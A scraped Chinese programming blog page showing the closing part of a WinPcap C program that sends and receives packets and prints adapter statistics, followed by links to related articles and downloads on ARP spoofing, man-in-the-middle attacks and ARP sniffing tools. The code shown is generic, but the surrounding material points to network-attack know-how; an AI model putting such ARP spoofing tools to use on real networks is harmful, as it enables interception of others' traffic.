		sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid);
	}

	WaitForSingleObject(sthread,INFINITE); 
	CloseHandle(sthread);
	CloseHandle(rthread);

	if(PacketGetStats(lpadapter,&stat)==FALSE)
	{
		printf("Warning: Unable to get the adapter stat/n");
	}
	else
	{
		printf("/n/n%d packets received, %d packets lost !/n",stat.bs_recv,stat.bs_drop);
	}
	PacketFreePacket(lppackets);
	PacketFreePacket(lppacketr);

	PacketCloseAdapter(lpadapter);

	return 0;
}

(全文完)


利用WinPcap编程,实现基于ARP欺骗的中间人攻击

*******此实验旨在交流学习,请勿用在非正常合法途径*******利用WinPcap编程,实现基于ARP欺骗的中间人攻击 一、实验内容 利用WinPcap,分别向被欺骗主机和网关发送APR请求包,...
  • Ni9htMar3
  • Ni9htMar3
  • 2017年01月19日 08:51
  • 2117

WinPcap实战(二)——接收ARP包

ARP帧结构ARP帧结构(28B):硬件类型(2B,Ethernet:0x1)——上层协议类型(2B,IP:0x0800)——硬件地址长度(1B,0x6)——IP地址长度(1B,0x4)——操作(2B...
  • u013539342
  • u013539342
  • 2015年09月17日 18:21
  • 1687

Winpcap网络编程九之Winpcap实战,ARP协议获得MAC表及主机通信

利用Winpcap 完成两台主机之间的数据通信(数据链路层) 仿真ARP协议获得网段内主机的MAC表 使用帧完成两台主机的通信(Hello! I’m …)...
  • u010467643
  • u010467643
  • 2014年10月18日 20:45
  • 5891

详谈调用winpcap驱动写arp多功能工具

Author: TOo2y[原创] E-mail: TOo2y@safechina.net Homepage: www.safechina.net Date: 11-9-2002 一 winpcap...
  • liujiayu2
  • liujiayu2
  • 2015年03月16日 20:34
  • 418

VC知识库文章 - 详谈调用winpcap驱动写arp多功能工具

导读:    [ 原创文档本文适合高级读者 已阅读41323次 ]    详谈调用winpcap驱动写arp多功能工具    作者:TOo2y    一 winpcap驱动简介    二 P...
  • dragon101788
  • dragon101788
  • 2011年12月08日 17:57
  • 429

基于WinPcap的ARP欺骗实验

  • 2017年07月19日 23:32
  • 1.97MB
  • 下载

基于winpcap的ARP发送程序

  • 2015年09月18日 13:23
  • 14.9MB
  • 下载

ARP欺骗程序(使用WinPcap)

  • 2008年10月29日 15:27
  • 1.49MB
  • 下载

winpcap arp欺骗程序

  • 2009年08月18日 15:45
  • 3KB
  • 下载

ARP监听程序(winpcap)

  • 2009年06月04日 19:01
  • 4KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:详谈调用winpcap驱动写arp多功能工具
举报原因:
原因补充:

(最多只允许输入30个字)